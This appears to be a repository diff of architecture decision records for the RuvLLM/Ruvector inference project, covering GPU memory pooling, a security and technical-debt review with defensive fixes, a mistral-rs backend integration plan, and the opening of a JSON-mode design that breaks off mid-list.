static ref EVICTION_TOTAL: Counter = register_counter!(
"ruvector_pages_evicted_total",
"Total pages evicted"
).unwrap();
}
```
## 12. Configuration
```yaml
memory_pool:
# Page configuration
page_size: "2MB" # 512KB, 1MB, 2MB, 4MB
total_pages: 4096 # Total pool size = page_size * total_pages
alignment: 256 # Bytes
# Allocation strategy
allocation_strategy: "best_fit" # first_fit, best_fit
thread_cache_size: 16 # Pages per thread cache
# Eviction policy
eviction:
policy: "lru_size_aware"
hysteresis: 0.1 # 10% hysteresis band
high_watermark: 0.90 # Start eviction at 90%
low_watermark: 0.80 # Stop eviction at 80%
# Pinning
pinning:
max_pin_duration: "30s" # Auto-unpin after this
pin_timeout: "100ms" # Timeout for pin acquisition
# Adapter serving
adapters:
hot_tier_budget: 100
warm_tier_budget: 1000
compression_threshold: "60s"
promotion_threshold: 10 # Accesses to promote
```
## 13. Consequences
### Positive
- **High Utilization**: Unified pool achieves >95% memory utilization
- **Low Fragmentation**: Page-based allocation eliminates external fragmentation
- **Scalable Multi-Tenancy**: Supports 10,000+ adapters with tiered residency
- **Predictable Latency**: Lock-free fast paths maintain sub-microsecond allocation
- **Graceful Degradation**: Hysteresis prevents thrashing under pressure
### Negative
- **Internal Fragmentation**: Fixed page size wastes space for small allocations
- **Complexity**: Reference counting and eviction add implementation complexity
- **Tuning Required**: Optimal performance requires workload-specific configuration
### Risks
| Risk | Likelihood | Impact | Mitigation |
|------|------------|--------|------------|
| Page size mismatch | Medium | Medium | Configurable page sizes |
| Eviction storms | Low | High | Hysteresis + priorities |
| Pin leaks | Medium | Medium | RAII + timeout enforcement |
| Adapter thrashing | Medium | Medium | Promotion/demotion thresholds |
## 14. Implementation Plan
### Phase 1: Core Pool (Week 1-2)
- [ ] Page allocator with metadata table
- [ ] Best-fit allocation algorithm
- [ ] Basic LRU eviction
- [ ] Unit tests for allocation/free
### Phase 2: Concurrency (Week 3-4)
- [ ] Lock-free free list
- [ ] Thread-local caching
- [ ] Two-phase activation
- [ ] Stress tests for concurrency
### Phase 3: Adapter Serving (Week 5-6)
- [ ] Residency tier management
- [ ] Heterogeneous batching
- [ ] Adapter compression
- [ ] Integration tests
### Phase 4: Observability (Week 7)
- [ ] Prometheus metrics
- [ ] Grafana dashboards
- [ ] Alerting rules
- [ ] Performance benchmarks
## 15. References
1. S-LoRA: Serving Thousands of Concurrent LoRA Adapters (arXiv:2311.03285)
2. vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention
3. CUDA Best Practices Guide: Memory Management
4. The Slab Allocator: An Object-Caching Kernel Memory Allocator (Bonwick, 1994)
5. Lock-Free Data Structures (Herlihy & Shavit)
## 16. Appendix
### A. Page State Machine
```
allocate()
+-------------------------------+
| |
v |
+-------+ pin() +--------+ |
| FREE |--------------->| PINNED |--+
+-------+ +--------+
^ |
| | unpin() && ref_count == 0
| v
| evict() +----------+
+-------------------| UNPINNED |
+----------+
```
### B. Memory Layout Example
```
GPU Memory (8GB total, 4096 x 2MB pages):
Pages 0-99: KV Cache Pool (hot)
Pages 100-199: LoRA Adapter Pool (hot tier, 100 adapters)
Pages 200-299: Temporary Buffers
Pages 300-3999: Dynamic allocation zone
Pages 4000-4095: Reserved for system
CPU Memory (host staging):
- Warm tier adapters (int8 compressed)
- Prefetch buffers
- Eviction targets
```
### C. Benchmark Targets
| Operation | Target Latency | Throughput |
|-----------|----------------|------------|
| Allocate 1 page | <100ns | >10M/s |
| Allocate 100 pages | <1us | >1M/s |
| Pin page | <50ns | >20M/s |
| Unpin page | <50ns | >20M/s |
| Evict 1 page | <10us | >100K/s |
| Load adapter (hot) | <100us | >10K/s |
| Load adapter (warm) | <1ms | >1K/s |
| Load adapter (cold) | <10ms | >100/s |
---
## Related Decisions
- **ADR-001**: Ruvector Core Architecture
- **ADR-002**: RuvLLM Integration
- **ADR-004**: KV Cache Management
- **ADR-007**: Security Review & Technical Debt
---
## Security Status (v2.1)
| Component | Status | Notes |
|-----------|--------|-------|
| PooledBuffer | ✅ Secure | Double-free prevention documented |
| PageAllocator | ✅ Secure | RAII handles prevent leaks |
| AdapterManager | ✅ Secure | Access control enforced |
**Fixes Applied:**
- Documented safety invariants in `PooledBuffer::Drop` implementation
- Added empty buffer check in `return_buffer()` to prevent double-free
See ADR-007 for full security audit trail.
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-18 | RuVector Architecture Team | Initial version |
| 1.1 | 2026-01-19 | Security Review Agent | Added security status, related decisions |

View File

@@ -0,0 +1,326 @@
# ADR-007: Security Review & Technical Debt Remediation
**Status:** Active
**Date:** 2026-01-19
**Decision Makers:** Ruvector Architecture Team
**Technical Area:** Security, Code Quality, Technical Debt Management
---
## Context and Problem Statement
Following the v2.1 release of RuvLLM and the ruvector monorepo, a comprehensive security audit and code quality review was conducted. The review identified critical security vulnerabilities, code quality issues, and technical debt that must be addressed before production deployment.
### Review Methodology
Four specialized review agents were deployed:
1. **Security Audit Agent**: CVE-style vulnerability analysis
2. **Code Quality Review Agent**: Architecture, patterns, and maintainability
3. **Rust Security Analysis Agent**: Memory safety and unsafe code audit
4. **Metal Shader Review Agent**: GPU shader security and correctness
### Summary of Findings
| Severity | Count | Status |
|----------|-------|--------|
| Critical | 8 | ✅ Fixed |
| High | 13 | Tracked |
| Medium | 31 | Tracked |
| Low | 18 | Tracked |
**Overall Quality Score:** 7.5/10
**Estimated Technical Debt:** ~52 hours
---
## Security Fixes Applied (Critical)
### 1. Metal Shader Threadgroup Memory Overflow
**File:** `crates/ruvllm/src/metal/shaders/gemm.metal`
**CVE-Style:** Buffer overflow in GEMM threadgroup memory
**Fix:** Reduced tile sizes to fit M4 Pro's 32KB threadgroup limit
```metal
// Before: TILE_SIZE 32 exceeded threadgroup memory
// After: TILE_SIZE_M=64, TILE_SIZE_N=64, TILE_SIZE_K=8
// Total: 64*8 + 8*64 + 64*64 = 5120 floats = 20KB < 32KB
```
### 2. Division by Zero in GQA Attention
**File:** `crates/ruvllm/src/metal/shaders/attention.metal`
**CVE-Style:** Denial of service via num_kv_heads=0
**Fix:** Added guard for zero denominator in grouped query attention
```metal
if (num_kv_heads == 0) return; // Guard against division by zero
const uint kv_head = head_idx / max(num_heads / num_kv_heads, 1u);
```
### 3. Integer Overflow in GGUF Parser
**File:** `crates/ruvllm/src/model/parser.rs`
**CVE-Style:** Integer overflow leading to undersized allocation
**Fix:** Added overflow check with explicit error handling
```rust
let total_bytes = element_count
.checked_mul(element_size)
.ok_or_else(|| Error::msg("Array size overflow in GGUF metadata"))?;
```
### 4. Race Condition in SharedArrayBuffer
**File:** `crates/ruvllm/src/wasm/shared.rs`
**CVE-Style:** Data race in WASM concurrent access
**Fix:** Added comprehensive documentation of safety requirements
```rust
/// # Safety
///
/// SharedArrayBuffer data races are prevented because:
/// 1. JavaScript workers coordinate via message passing
/// 2. Atomics.wait/notify provide synchronization primitives
/// 3. Our WASM binding only reads after Atomics.wait returns
```
### 5. Unsafe Transmute in iOS Learning
**File:** `crates/ruvllm/src/learning/ios_learning.rs`
**CVE-Style:** Type confusion via unvalidated transmute
**Fix:** Added comprehensive safety comments documenting invariants
### 6. Norm Shader Buffer Overflow
**File:** `crates/ruvllm/src/metal/shaders/norm.metal`
**CVE-Style:** Stack buffer overflow for hidden_size > 1024
**Fix:** Added constant guard and early return
```metal
constant uint MAX_HIDDEN_SIZE_FUSED = 1024;
if (hidden_size > MAX_HIDDEN_SIZE_FUSED) return;
```
### 7. KV Cache Unsafe Slice Construction
**File:** `crates/ruvllm/src/kv_cache.rs`
**CVE-Style:** Undefined behavior in slice::from_raw_parts
**Fix:** Added safety documentation and proper `set_len_unchecked` method
```rust
/// # Safety
/// - `new_len <= self.capacity`
/// - All elements up to `new_len` have been initialized
#[inline(always)]
pub(crate) unsafe fn set_len_unchecked(&mut self, new_len: usize) {
debug_assert!(new_len <= self.capacity);
self.len = new_len;
}
```
### 8. Memory Pool Double-Free Risk
**File:** `crates/ruvllm/src/memory_pool.rs`
**CVE-Style:** Double-free in PooledBuffer Drop
**Fix:** Documented safety invariants in Drop implementation
```rust
impl Drop for PooledBuffer {
fn drop(&mut self) {
// SAFETY: Double-free prevention
// 1. Each PooledBuffer has exclusive ownership of its `data` Box
// 2. We swap with empty Box to take ownership before returning
// 3. return_buffer() checks for empty buffers and ignores them
let data = std::mem::replace(&mut self.data, Box::new([]));
self.pool.return_buffer(self.size_class, data);
}
}
```
---
## Outstanding Technical Debt
### Priority 0 (Critical Path)
#### TD-001: Code Duplication in Linear Transform
**Files:** `phi3.rs`, `gemma2.rs`
**Issue:** Identical `linear_transform` implementations (27 lines each)
**Impact:** Maintenance burden, divergence risk
**Recommendation:** Extract to shared `ops` module
**Effort:** 2 hours
#### TD-002: Hardcoded Worker Pool Timeout
**File:** `crates/ruvllm/src/serving.rs`
**Issue:** `const WORKER_TIMEOUT: Duration = Duration::from_millis(200);`
**Impact:** Not configurable for different workloads
**Recommendation:** Make configurable via ServingConfig
**Effort:** 4 hours
#### TD-003: Placeholder Token Generation
**File:** `crates/ruvllm/src/serving.rs`
**Issue:** `ServingEngine::generate_tokens` returns dummy response
**Impact:** Core functionality not implemented
**Recommendation:** Wire to actual model inference pipeline
**Effort:** 8 hours
### Priority 1 (High Impact)
#### TD-004: Incomplete GPU Shaders
**Files:** `attention.metal`, `norm.metal`
**Issue:** Placeholder kernels that don't perform actual computation
**Impact:** No GPU acceleration in production
**Recommendation:** Implement full Flash Attention and RMSNorm
**Effort:** 16 hours
#### TD-005: GGUF Model Loading Not Implemented
**File:** `crates/ruvllm/src/model/loader.rs`
**Issue:** GGUF format parsing exists but loading is stubbed
**Impact:** Cannot load quantized models
**Recommendation:** Complete tensor extraction and memory mapping
**Effort:** 8 hours
#### TD-006: NEON SIMD Inefficiency
**File:** `crates/ruvllm/src/simd/neon.rs`
**Issue:** Activation functions process scalars, not vectors
**Impact:** 4x slower than optimal on ARM64
**Recommendation:** Vectorize SiLU, GELU using NEON intrinsics
**Effort:** 4 hours
### Priority 2 (Medium Impact)
#### TD-007: Embedded JavaScript in Rust
**File:** `crates/ruvllm/src/wasm/bindings.rs`
**Issue:** Raw JavaScript strings embedded in Rust code
**Impact:** Hard to maintain, no syntax highlighting
**Recommendation:** Move to separate `.js` files, use include_str!
**Effort:** 2 hours
#### TD-008: Missing Configuration Validation
**File:** `crates/ruvllm/src/config.rs`
**Issue:** No validation for config field ranges
**Impact:** Silent failures with invalid configs
**Recommendation:** Add validation in constructors
**Effort:** 2 hours
#### TD-009: Excessive Allocations in Attention
**File:** `crates/ruvllm/src/attention.rs`
**Issue:** Vec allocations per forward pass
**Impact:** GC pressure, latency spikes
**Recommendation:** Pre-allocate scratch buffers
**Effort:** 4 hours
#### TD-010: Missing Error Context
**Files:** Multiple
**Issue:** `anyhow::Error` without `.context()`
**Impact:** Hard to debug in production
**Recommendation:** Add context to all fallible operations
**Effort:** 3 hours
### Priority 3 (Low Impact)
#### TD-011: Non-Exhaustive Configs
**Files:** `config.rs`, `serving.rs`
**Issue:** Structs should be `#[non_exhaustive]` for API stability
**Impact:** Breaking changes on field additions
**Recommendation:** Add attribute to public config structs
**Effort:** 1 hour
#### TD-012: Missing Debug Implementations
**Files:** Multiple model structs
**Issue:** Large structs lack `Debug` impl
**Impact:** Hard to log state for debugging
**Recommendation:** Derive or implement Debug with redaction
**Effort:** 2 hours
#### TD-013: Inconsistent Error Types
**Files:** `parser.rs`, `loader.rs`, `serving.rs`
**Issue:** Mix of anyhow::Error, custom errors, Results
**Impact:** Inconsistent error handling patterns
**Recommendation:** Standardize on thiserror-based hierarchy
**Effort:** 4 hours
---
## Implementation Recommendations
### Phase 1: Critical Path (Week 1)
- [ ] TD-001: Extract linear_transform to ops module
- [ ] TD-002: Make worker timeout configurable
- [ ] TD-003: Implement token generation pipeline
### Phase 2: Performance (Weeks 2-3)
- [ ] TD-004: Complete GPU shader implementations
- [ ] TD-005: Finish GGUF model loading
- [ ] TD-006: Vectorize NEON activation functions
### Phase 3: Quality (Week 4)
- [ ] TD-007: Extract embedded JavaScript
- [ ] TD-008: Add configuration validation
- [ ] TD-009: Optimize attention allocations
- [ ] TD-010: Add error context throughout
### Phase 4: Polish (Week 5)
- [ ] TD-011: Add #[non_exhaustive] attributes
- [ ] TD-012: Implement Debug for model structs
- [ ] TD-013: Standardize error types
---
## Decision Outcome
### Chosen Approach
**Track and remediate incrementally** with the following guidelines:
1. **Critical security issues**: Fix immediately before any production deployment
2. **P0 technical debt**: Address in next sprint
3. **P1-P3 items**: Schedule based on feature roadmap intersection
### Rationale
- Security vulnerabilities pose immediate risk and were fixed
- Technical debt should not block v2.1 release for internal use
- Incremental improvement allows velocity while maintaining quality
### Consequences
**Positive:**
- Clear tracking of all known issues
- Prioritized remediation path
- Security issues documented for audit trail
**Negative:**
- Technical debt accumulates interest if not addressed
- Some edge cases may cause issues in production
**Risks:**
- TD-003 (placeholder generation) blocks real inference workloads
- TD-004 (GPU shaders) prevents Metal acceleration benefits
---
## Compliance and Audit
### Security Review Artifacts
- Security audit report: `docs/security/audit-2026-01-19.md`
- Code quality report: Captured in this ADR
- Rust security analysis: All unsafe blocks documented
### Verification
- [ ] All critical fixes have regression tests
- [ ] Unsafe code blocks have safety comments
- [ ] Metal shaders have bounds checking
---
## References
- ADR-001: Ruvector Core Architecture
- ADR-002: RuvLLM Integration
- ADR-004: KV Cache Management
- ADR-006: Memory Management
- OWASP Memory Safety Guidelines
- Rust Unsafe Code Guidelines
---
## Changelog
| Date | Author | Change |
|------|--------|--------|
| 2026-01-19 | Security Review Agent | Initial draft |
| 2026-01-19 | Architecture Team | Applied 8 critical fixes |

View File

@@ -0,0 +1,468 @@
# ADR-008: mistral-rs Integration for Production-Scale LLM Serving
**Status:** Proposed
**Date:** 2026-01-20
**Decision Makers:** Ruvector Architecture Team
**Technical Area:** LLM Inference Engine / Production Serving
---
## Context and Problem Statement
RuvLLM v2.3 includes a stub `MistralBackend` implementation at `crates/ruvllm/src/backends/mistral_backend.rs` that defines the interface for high-performance LLM inference but lacks actual integration with the mistral-rs crate. The current Candle backend is optimized for single-user and edge deployment scenarios, but production-scale serving requires advanced memory management and multi-tenant capabilities.
### Current State
The existing `MistralBackend` stub provides:
- Configuration structures for PagedAttention, X-LoRA, and ISQ
- `XLoraManager` with adapter loading/routing logic (placeholder)
- `MistralBackendConfig` with builder pattern for Metal/CUDA targets
- Integration hooks for the `LlmBackend` trait
However, the implementation is non-functional:
- No actual mistral-rs crate dependency
- Token generation returns placeholder values
- Model loading does not wire to inference pipeline
- PagedAttention uses RuvLLM's internal implementation, not mistral-rs's optimized version
### Key Challenges
1. **Concurrent User Scaling**: Candle backend is optimized for single-user inference; production servers need 10-100+ concurrent requests
2. **KV Cache Memory Pressure**: Without vLLM-style paging, long-context sessions exhaust GPU memory
3. **Multi-Task Models**: LoRA adapter switching requires per-request overhead; X-LoRA enables per-token routing
4. **Deployment Flexibility**: Models should be quantized at runtime based on available hardware
---
## Decision Drivers
### Performance Requirements
- **Concurrent sessions**: 50-100 simultaneous inference requests
- **Memory efficiency**: 5-10x improvement in KV cache utilization
- **Adapter latency**: <1ms overhead for X-LoRA routing decisions
- **Quantization**: Runtime ISQ without model re-export
### Compatibility Requirements
- **Existing interface**: Must implement `LlmBackend` trait seamlessly
- **Feature isolation**: Optional dependency with feature flags
- **Backend selection**: Runtime choice between Candle and mistral-rs
### Hardware Requirements
- **Apple Silicon**: Metal acceleration via `mistral-rs-metal`
- **NVIDIA GPUs**: CUDA acceleration via `mistral-rs-cuda`
- **CPU fallback**: Pure Rust path for edge/WASM targets
---
## Considered Options
### Option A: Fork and Embed mistral-rs
Vendor mistral-rs source code directly into RuvLLM.
**Pros:**
- Full control over API surface
- No external dependency versioning
- Can customize for RuvLLM's needs
**Cons:**
- Maintenance burden of tracking upstream
- Miss upstream optimizations and fixes
- Duplicated effort
### Option B: Optional Dependency with Feature Flags
Add mistral-rs as an optional dependency behind feature flags, wiring the existing `MistralBackend` interface to actual mistral-rs crate.
**Pros:**
- Leverage upstream development
- Clean separation via features
- Users choose their backend at compile time
- Smaller binary for edge deployments (Candle-only)
**Cons:**
- API surface depends on upstream stability
- Two codepaths to maintain
- Feature matrix complexity
### Option C: Runtime Backend Selection
Use dynamic dispatch to select backend at runtime via configuration.
**Pros:**
- Single binary for all deployments
- Runtime flexibility
**Cons:**
- Binary size includes all backends
- Dynamic dispatch overhead
- Complex testing matrix
---
## Decision Outcome
**Chosen Option: Option B - Optional Dependency with Feature Flags**
Add mistral-rs as an optional dependency with three feature flags, wiring the existing `MistralBackend` stub to the actual mistral-rs implementation.
### Rationale
1. **Separation of concerns**: Edge deployments use Candle (no mistral-rs dependency); server deployments enable mistral-rs features
2. **Upstream leverage**: mistral-rs team maintains PagedAttention, X-LoRA, ISQ implementations
3. **Existing interface**: The `MistralBackend` stub already defines the API; we wire it to real implementation
4. **Incremental adoption**: Users can migrate from Candle to mistral-rs backend per-deployment
---
## Technical Specifications
### Feature Flags
```toml
# Cargo.toml additions
[features]
default = ["candle-backend"]
# Base mistral-rs integration
mistral-rs = ["dep:mistralrs", "dep:mistralrs-core"]
# Apple Silicon Metal acceleration
mistral-rs-metal = ["mistral-rs", "mistralrs/metal"]
# NVIDIA CUDA acceleration
mistral-rs-cuda = ["mistral-rs", "mistralrs/cuda"]
[dependencies]
# Optional mistral-rs integration
mistralrs = { version = "0.3", optional = true }
mistralrs-core = { version = "0.3", optional = true }
```
### Feature Matrix
| Feature | Candle | mistral-rs | mistral-rs-metal | mistral-rs-cuda |
|---------|--------|------------|------------------|-----------------|
| Single-user inference | Yes | Yes | Yes | Yes |
| PagedAttention | No | Yes | Yes | Yes |
| X-LoRA | No | Yes | Yes | Yes |
| ISQ | No | Yes | Yes | Yes |
| Metal acceleration | Yes | No | Yes | No |
| CUDA acceleration | Partial | No | No | Yes |
| WASM support | Yes | No | No | No |
| Binary size | ~15MB | ~45MB | ~50MB | ~60MB |
### Architecture
```
+-----------------------------------------------------------------------+
| MISTRAL-RS INTEGRATION ARCHITECTURE |
+-----------------------------------------------------------------------+
| |
| +-------------------+ +-------------------+ +--------------+ |
| | MistralBackend | | mistralrs::Model | | Hardware | |
| | (RuvLLM adapter) | | (inference core) | | Accelerator | |
| | | | | | | |
| | - Config mapping |---->| - PagedAttention |---->| - Metal | |
| | - Trait impl | | - X-LoRA routing | | - CUDA | |
| | - Error handling | | - ISQ runtime | | - CPU | |
| +--------+----------+ +---------+---------+ +------+-------+ |
| | | | |
| v v v |
| +--------+----------+ +---------+---------+ +------+-------+ |
| | LlmBackend trait | | KV Cache Pool | | Tensor Ops | |
| | (RuvLLM unified) | | (PagedAttention) | | (kernels) | |
| +-------------------+ +-------------------+ +--------------+ |
| |
+-----------------------------------------------------------------------+
```
### Key Features to Enable
#### 1. PagedAttention (vLLM-style KV Cache Management)
PagedAttention partitions the KV cache into fixed-size blocks (pages) that can be allocated non-contiguously, enabling:
- **5-10x concurrent users**: Memory shared across requests via copy-on-write pages
- **Dynamic allocation**: Pages allocated as sequences grow, freed when complete
- **Prefix caching**: Common prefixes (system prompts) share pages across requests
```rust
/// PagedAttention configuration for mistral-rs
#[cfg(feature = "mistral-rs")]
pub struct PagedAttentionConfig {
/// Block size in tokens (typical: 16)
pub block_size: usize,
/// Maximum blocks in page table
pub max_blocks: usize,
/// GPU memory fraction for KV cache (0.0-1.0)
pub gpu_memory_fraction: f32,
/// Enable prefix caching for repeated prompts
pub enable_prefix_caching: bool,
}
impl Default for PagedAttentionConfig {
fn default() -> Self {
Self {
block_size: 16,
max_blocks: 4096,
gpu_memory_fraction: 0.9,
enable_prefix_caching: true,
}
}
}
```
**Performance Impact:**
| Metric | Without PagedAttention | With PagedAttention |
|--------|------------------------|---------------------|
| Concurrent users | 1-2 | 10-50 |
| Memory utilization | 40-60% | 85-95% |
| Memory fragmentation | High | Near-zero |
#### 2. X-LoRA (eXpert-mixed LoRA)
X-LoRA enables per-token adapter routing for multi-task models:
- **Dynamic mixing**: Router network selects adapters per token
- **Learned routing**: MLP router trained on adapter selection
- **Top-k activation**: Only k adapters compute per token (efficiency)
```rust
/// X-LoRA configuration for multi-adapter inference
#[cfg(feature = "mistral-rs")]
pub struct XLoraConfig {
/// Adapter names/paths to load
pub adapters: Vec<String>,
/// Top-k adapters to activate per token
pub top_k: usize,
/// Router temperature for softmax
pub temperature: f32,
/// Mixing mode
pub mixing_mode: XLoraMixingMode,
}
#[derive(Debug, Clone, Copy)]
pub enum XLoraMixingMode {
/// Sum weighted adapter outputs
Additive,
/// Concatenate and project
Concatenate,
/// Gated mixture with learned gates
Gated,
}
```
**Use Cases:**
- Code + chat model: Route code tokens to code adapter, natural language to chat adapter
- Multi-language: Route based on detected language
- Domain-specific: Finance, medical, legal adapters activated by context
#### 3. ISQ (In-Situ Quantization)
ISQ enables runtime quantization without pre-exported quantized models:
- **Runtime flexibility**: Same model weights, different quantization per deployment
- **Memory adaptation**: Quantize to fit available hardware
- **Quality preservation**: Activation-aware methods (AWQ, GPTQ) maintain accuracy
```rust
/// ISQ configuration for runtime quantization
#[cfg(feature = "mistral-rs")]
pub struct IsqConfig {
/// Quantization bits (2, 4, 8)
pub bits: u8,
/// Quantization method
pub method: IsqMethod,
/// Calibration dataset size
pub calibration_samples: usize,
}
#[derive(Debug, Clone, Copy)]
pub enum IsqMethod {
/// Activation-aware Weight Quantization
AWQ,
/// GPTQ with optimal brain quantization
GPTQ,
/// Round-to-nearest (fastest, lower quality)
RTN,
/// SmoothQuant (activation smoothing)
SmoothQuant,
}
```
**Performance Impact:**
| Method | Bits | Memory Reduction | Quality Loss |
|--------|------|------------------|--------------|
| AWQ | 4 | 4x | <1% |
| GPTQ | 4 | 4x | <1% |
| RTN | 4 | 4x | 2-3% |
| AWQ | 2 | 8x | 3-5% |
### Implementation Roadmap
#### Phase 1: Core Integration (Week 1-2)
1. Add mistral-rs dependencies with feature flags
2. Implement config mapping: `MistralBackendConfig` -> `mistralrs::Config`
3. Wire `load_model` to mistral-rs model loading
4. Wire `generate` and `generate_stream` to mistral-rs inference
```rust
#[cfg(feature = "mistral-rs")]
impl LlmBackend for MistralBackend {
fn load_model(&mut self, model_id: &str, config: ModelConfig) -> Result<()> {
use mistralrs::{ModelKind, MistralRs, MistralRsBuilder};
let builder = MistralRsBuilder::new(model_id)
.with_paged_attention(self.config.paged_attention.as_ref().map(|pa| {
mistralrs::PagedAttentionConfig {
block_size: pa.block_size,
..Default::default()
}
}));
self.inner = Some(builder.build()?);
Ok(())
}
fn generate(&self, prompt: &str, params: GenerateParams) -> Result<String> {
let inner = self.inner.as_ref()
.ok_or_else(|| Error::msg("Model not loaded"))?;
let request = mistralrs::Request::new(prompt)
.with_max_tokens(params.max_tokens)
.with_temperature(params.temperature);
let response = inner.send_request(request)?;
Ok(response.text)
}
}
```
#### Phase 2: Advanced Features (Week 3-4)
1. Enable PagedAttention with configurable parameters
2. Add X-LoRA adapter loading and routing
3. Implement ISQ with calibration pipeline
#### Phase 3: Hardware Acceleration (Week 5-6)
1. Test and validate Metal acceleration
2. Test and validate CUDA acceleration
3. Benchmark against Candle backend
---
## Consequences
### Positive Consequences
1. **Production-scale serving**: PagedAttention enables 5-10x more concurrent users
2. **Multi-task efficiency**: X-LoRA eliminates adapter switching overhead
3. **Deployment flexibility**: ISQ allows runtime quantization decisions
4. **Upstream maintenance**: mistral-rs team maintains core inference optimizations
5. **Feature parity**: Access to latest mistral-rs features (Flash Attention 2, speculative decoding)
### Negative Consequences
1. **Dependency complexity**: Additional crate dependencies increase build complexity
2. **API surface coupling**: Changes in mistral-rs may require RuvLLM updates
3. **Feature matrix**: Two backend codepaths require testing both paths
4. **WASM incompatibility**: mistral-rs does not support WASM targets
### Neutral Consequences
1. **Two backend options**: Candle remains optimal for edge/WASM; mistral-rs for server
2. **Compile-time selection**: Users choose backend via feature flags
3. **Binary size tradeoff**: Server builds are larger; edge builds unchanged
### Risk Mitigation
| Risk | Mitigation |
|------|------------|
| mistral-rs API instability | Pin to specific version; abstract via MistralBackend interface |
| Feature flag complexity | Comprehensive CI matrix testing all feature combinations |
| Performance regression | Benchmark suite comparing Candle vs mistral-rs |
| Metal/CUDA compatibility | Platform-specific CI runners for hardware validation |
---
## Alternatives Considered
### llama.cpp via rust-llama
- **Rejected**: Different model format (GGUF), weaker Rust integration
- **Consideration**: Could add as third backend for GGUF model support
### candle-transformers PagedAttention
- **Rejected**: Candle's PagedAttention is experimental and less mature
- **Consideration**: Monitor upstream development
### vLLM Python Backend
- **Rejected**: Python FFI adds latency; deployment complexity
- **Consideration**: vLLM's algorithm informs our understanding
---
## Related Decisions
- **ADR-001**: Ruvector Core Architecture (HNSW, Graph Store)
- **ADR-002**: RuvLLM Integration with Ruvector
- **ADR-003**: SIMD Optimization Strategy
- **ADR-004**: KV Cache Management
- **ADR-006**: Memory Management
- **ADR-007**: Security Review & Technical Debt
---
## Compliance and Standards
### API Compatibility
- `MistralBackend` implements `LlmBackend` trait
- All existing RuvLLM consumers work unchanged
- Feature flags are additive (no breaking changes)
### Testing Requirements
- Unit tests for config mapping
- Integration tests with sample models
- Benchmark suite comparing backends
- CI matrix for feature flag combinations
### Documentation Requirements
- Feature flag documentation in README
- Backend selection guide
- Performance comparison benchmarks
---
## References
1. mistral-rs Repository: https://github.com/EricLBuehler/mistral.rs
2. vLLM PagedAttention Paper: "Efficient Memory Management for Large Language Model Serving with PagedAttention"
3. X-LoRA Paper: "X-LoRA: Mixture of Low-Rank Adapter Experts"
4. ISQ/AWQ Paper: "AWQ: Activation-aware Weight Quantization for LLM Compression"
5. Existing MistralBackend stub: `crates/ruvllm/src/backends/mistral_backend.rs`
---
## Implementation Status
| Component | Status | Notes |
|-----------|--------|-------|
| Feature flags | Pending | Add to Cargo.toml |
| Config mapping | Pending | MistralBackendConfig -> mistralrs::Config |
| Model loading | Pending | Wire to mistral-rs loader |
| Generation | Pending | Wire to mistral-rs inference |
| PagedAttention | Pending | Enable via config |
| X-LoRA | Pending | Wire existing XLoraManager |
| ISQ | Pending | Implement calibration pipeline |
| Metal acceleration | Pending | Test on Apple Silicon |
| CUDA acceleration | Pending | Test on NVIDIA GPUs |
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-20 | Ruvector Architecture Team | Initial proposal |

View File

@@ -0,0 +1,793 @@
# ADR-009: Structured Output / JSON Mode for Reliable Agentic Workflows
**Status:** Proposed
**Date:** 2026-01-20
**Decision Makers:** Ruvector Architecture Team
**Technical Area:** LLM Generation / Structured Output
---
## Context and Problem Statement
RuvLLM v2.3 provides robust text generation capabilities but lacks structured output enforcement, which is critical for production agentic workflows. Modern frameworks (LangChain, CrewAI, Claude Flow, AutoGen) rely on LLMs producing valid JSON for tool use, function calling, and structured data extraction. Without JSON mode support, RuvLLM cannot reliably power these workflows.
### Current State
RuvLLM's existing `generate` interface returns unstructured text:
```rust
pub trait LlmBackend {
fn generate(&self, prompt: &str, params: GenerateParams) -> Result<String>;
fn generate_stream(&self, prompt: &str, params: GenerateParams) -> impl Stream<Item = String>;
}
```
Users requesting JSON output face:
- **Malformed JSON**: Models generate invalid JSON (~5-15% failure rate even with prompting)
- **No schema validation**: Output may be valid JSON but violate expected structure
- **Post-processing overhead**: Parsing, validation, and error handling must be manual
- **Retry complexity**: Applications must implement retry loops with repair attempts
### Key Challenges
1. **Agentic Framework Integration**: LangChain, CrewAI, Claude Flow require guaranteed JSON for tool/function calling
2. **Production Reliability**: 95%+ success rate needed; current prompting-based approaches achieve 85-95%
3. **Schema Enforcement**: Output must conform to JSON Schema or Pydantic models
4. **Performance**: Constrained decoding adds computational overhead to generation
### Real-World Impact
**Without JSON Mode:**
```python
# Current unreliable workflow
response = llm.generate("Extract person info as JSON: {text}")
try:
data = json.loads(response) # May fail
assert "name" in data # May fail
assert "age" in data # May fail
except:
# Retry with prompt engineering, repair attempts, etc.
pass
```
**With JSON Mode:**
```python
# Reliable workflow with schema
schema = {"type": "object", "properties": {"name": {"type": "string"}, "age": {"type": "integer"}}}
response = llm.generate_json("Extract person info: {text}", schema=schema)
# Guaranteed valid JSON conforming to schema
```
---
## Decision Drivers
### Reliability Requirements
- **99%+ valid JSON**: Eliminate malformed JSON failures
- **Schema conformance**: Guarantee output matches expected structure
- **Graceful degradation**: Repair mode for minor violations vs strict failure
### Performance Requirements
- **Minimal overhead**: <10% latency increase for JSON mode
- **Streaming compatible**: Support streaming JSON generation
- **Scalable**: Constrained decoding must work with large vocabularies (32K-128K tokens)
### Compatibility Requirements
- **Framework integration**: Compatible with LangChain, CrewAI, Claude Flow tool use
- **Schema standards**: Support JSON Schema, Pydantic models, TypeScript interfaces
- **Backward compatibility**: Existing `generate` interface unchanged
### Developer Experience
- **Simple API**: Single parameter enables JSON mode
- **Validation feedback**: Clear error messages on schema violations
- **Grammar flexibility**: Support custom grammars for domain-specific formats
---
## Considered Options
### Option A: Post-Generation Validation Only
Validate and repair JSON after generation completes.
**Pros:**
- Zero generation overhead
- Simple implementation
- Works with any model
**Cons:**
- Does not prevent invalid JSON (still 5-15% failures)
- Repair attempts may fail or produce incorrect data
- Wasted compute on failed generations
- Requires retry loops
### Option B: Constrained Decoding (Token-Level Enforcement)
Modify logits during generation to enforce JSON grammar at each token.
**Pros:**
- Guaranteed valid JSON (100% success rate)
- No retry loops needed
- Works with streaming generation
- Can enforce complex grammars
**Cons:**
- 5-10% latency overhead per token
- Implementation complexity (state machine for JSON structure)
- Requires access to model logits
### Option C: Fine-Tuned JSON Models
Train separate model checkpoints optimized for JSON output.
**Pros:**
- Best performance (native JSON understanding)
